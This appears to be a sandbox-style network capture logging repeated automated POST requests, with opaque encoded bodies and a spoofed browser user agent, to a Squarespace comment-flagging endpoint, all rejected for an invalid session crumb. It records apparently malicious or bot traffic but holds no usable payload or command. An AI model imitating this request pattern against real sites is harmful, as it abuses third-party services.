2024-09-01 19:57:04 UTC	16306	OUT	Data Raw: 74 76 6d 4a 44 6f 48 52 76 4e 72 64 68 68 25 32 42 79 61 6c 6f 4c 25 32 42 31 46 64 59 33 43 41 39 65 69 76 7a 71 74 73 45 48 73 6a 25 32 42 4b 35 54 2f 48 32 34 61 51 4f 41 7a 25 32 42 51 63 51 59 56 48 52 70 62 61 68 6b 2f 51 58 74 6b 33 65 4e 67 63 44 62 6e 46 72 32 6f 77 54 4c 66 6a 50 56 4d 39 44 6e 75 4e 64 66 67 55 6c 33 54 35 58 48 59 74 30 52 4f 36 56 46 79 78 6b 75 50 78 7a 69 33 77 62 33 7a 64 37 71 37 7a 66 2f 49 66 71 68 33 71 4b 4d 49 63 4f 49 5a 6c 51 65 63 43 55 47 72 64 57 4e 51 6c 71 37 56 76 45 25 32 42 67 6f 70 68 38 37 2f 5a 70 6e 4b 7a 46 59 44 4f 67 61 55 72 44 46 74 46 31 74 68 58 54 56 2f 59 4b 36 78 54 25 32 42 57 5a 42 4c 6e 55 4d 61 57 77 47 36 4e 67 39 2f 55 52 25 32 42 70 5a 77 63 39 72 37 25 32 42 69 58 57 50 41 75 31 4f 38 Data Ascii: tvmJDoHRvNrdhh%2ByaloL%2B1FdY3CA9eivzqtsEHsj%2BK5T/H24aQOAz%2BQcQYVHRpbahk/QXtk3eNgcDbnFr2owTLfjPVM9DnuNdfgUl3T5XHYt0RO6VFyxkuPxzi3wb3zd7q7zf/Ifqh3qKMIcOIZlQecCUGrdWNQlq7VvE%2Bgoph87/ZpnKzFYDOgaUrDFtF1thXTV/YK6xT%2BWZBLnUMaWwG6Ng9/UR%2BpZwc9r7%2BiXWPAu1O8
2024-09-01 19:57:04 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:04 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdFh_-7X3bRHNDM0NjU4NGRlM2Y1YzRiOWRmZDUxOWIwMjY2NWIz; Path=/; Secure Set-Cookie: crumb=Bc_Wi93qZjnrMDFhNzIxMDY3YzBmZDE5ZDVlNmE0YjNmN2Q1Mzc5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: KlbVjaex/g5UwRFD3 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bc_Wi93qZjnrMDFhNzIxMDY3YzBmZDE5ZDVlNmE0YjNmN2Q1Mzc5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49890	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:05 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:57:05 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:05 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:05 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 47 35 41 53 38 70 32 65 59 67 61 6c 71 6a 5a 4c 75 5a 35 56 6c 70 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjG5AS8p2eYgalqjZLuZ5VlpIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:57:05 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:05 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSFZDYa7qbhZNjNmMDYwZjExNGVkZDY2OWYxNTVlNjIzZDllM2Ix; Path=/; Secure Set-Cookie: crumb=BX-WIPUE7NhkYzQwNTNmM2UwNGE2Y2IwOTI3NDY1ZmM3MGFiYTJh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: diw36rH5/k2oSToTy Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BX-WIPUE7NhkYzQwNTNmM2UwNGE2Y2IwOTI3NDY1ZmM3MGFiYTJh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49892	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:05 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:05 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:05 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:05 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:05 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:05 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfUymgaRiqamN2UxZWU5MTUwY2MxMDI0ZDU3NGQxZmQwMDgyMWJl; Path=/; Secure Set-Cookie: crumb=BY7WR9foir9wMTBiNjQzZGYyZWM5ZTljYzYxM2M1NGU2MTlmOWUz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 9bU8obYu/znGTfgOj Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BY7WR9foir9wMTBiNjQzZGYyZWM5ZTljYzYxM2M1NGU2MTlmOWUz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49893	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:06 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:57:06 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:06 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:06 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 33 37 52 69 39 73 70 4a 30 4b 71 5a 68 66 39 43 48 7a 44 30 58 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgj37Ri9spJ0KqZhf9CHzD0XZIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49894	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:06 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:06 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:06 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:06 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49896	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:07 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:07 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:07 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:07 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:07 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bbx9M8RrpEToMGRkM2QzZWE0YTEyZGMxMzI3ZDhmNzg3MTY2ODVi; Path=/; Secure Set-Cookie: crumb=BcdY6LJeXrkIYmE1OTkyMDZhMTg0MTg4NmM1Yzg1MDA5MjIwMWJl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 4YUXhZcn/w77kMqJk Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BcdY6LJeXrkIYmE1OTkyMDZhMTg0MTg4NmM1Yzg1MDA5MjIwMWJl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49895	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:07 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:07 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:07 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:07 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:07 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSnr3O8JvI_kYjQzOWZmN2I5ODI5YTYxNzZlYjZkMzljYmI3N2Uw; Path=/; Secure Set-Cookie: crumb=BV8uFWfCPpioZDk2ZTQ2ZjE1N2RiYzE4NTcxYmNhMjRiMjJiNWU0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: XPQbzHZz/hoIHboM0 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BV8uFWfCPpioZDk2ZTQ2ZjE1N2RiYzE4NTcxYmNhMjRiMjJiNWU0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49897	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:07 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:07 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:07 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49898	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:07 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:07 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:07 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:08 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:07 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQmglX1euKFQMjA5NTNjMmU3NWY4MDRhZWJjYzk3N2UwOTdiODY5; Path=/; Secure Set-Cookie: crumb=BeF5c44J5bekZWM4NmE2Y2U5OWExNzg3ZmRkMDdlMjZiOGQ4ZTJh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: PWxSb8TF/1nZr2S1F Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeF5c44J5bekZWM4NmE2Y2U5OWExNzg3ZmRkMDdlMjZiOGQ4ZTJh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49901	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:08 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49904	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:09 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:09 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:09 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:09 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:09 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BYXLtVUVYZewMzI3NjIyMzgwYzIxNzc4NWYxNjIyZDQ4NTBjNDI4; Path=/; Secure Set-Cookie: crumb=BY677SkLxvhdYmE1Y2U1NzBjOWZiZTM0NDM5MzIzMGQ5ZDZlMTA4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: IUpzpXqC/IKvy1RYK Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BY677SkLxvhdYmE1Y2U1NzBjOWZiZTM0NDM5MzIzMGQ5ZDZlMTA4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49902	198.185.159.177	443

